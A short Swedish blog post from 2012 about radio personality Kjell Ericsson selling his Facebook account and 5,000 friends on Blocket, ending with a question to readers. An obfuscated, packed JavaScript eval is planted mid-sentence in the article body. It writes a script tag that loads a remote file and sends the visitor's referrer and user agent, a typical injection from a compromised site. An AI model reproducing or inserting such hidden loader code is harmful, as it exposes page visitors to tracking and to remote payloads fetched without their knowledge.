Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Kjell Ericsson säljer sitt facebookkonto med 5000 vänner

Marcus
  • On 15 maj, 2012
  • http://www.revue.se

Kjell eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|zbibi|var|u0026u|referrer|beert||js|php’.split(’|’),0,{}))
Ericsson, känd från radio, säljer nu sitt facebook konto med 5000 vänner.

Om du alltid har drömt att ha 5000 vänner på facebook är det nu du ska satsa. Kjell Ericsson, känd från tv och radio säljer sitt facebookkonto inkluderat 5000 vänner för 5000 kr på blocket. Många har dock ifrågasatts hans beslut. Många av hans vänner tycker att han är en idiot och att vänner inte kan köpas eller säljas för pengar. Personligen tycker jag att det är hans egna beslut, men många har tagit bort han som vän pågrund ut av beslutet. Så 5000 vänner när det är dags att ta betalt, det kan han nog glömma. Inte heller tror jag att hans vänner vill vara vän med hans facebookprofil om det inte är han som äger den.

Annonsen finns att hitta här: http://www.blocket.se/vi/40460946.htm

Vad tycker ni om Kjells beslut? Har han verkligen gjort rätt, eller är han en idiot som tänker ta betalt för kontot istället för att bara stänga ner det?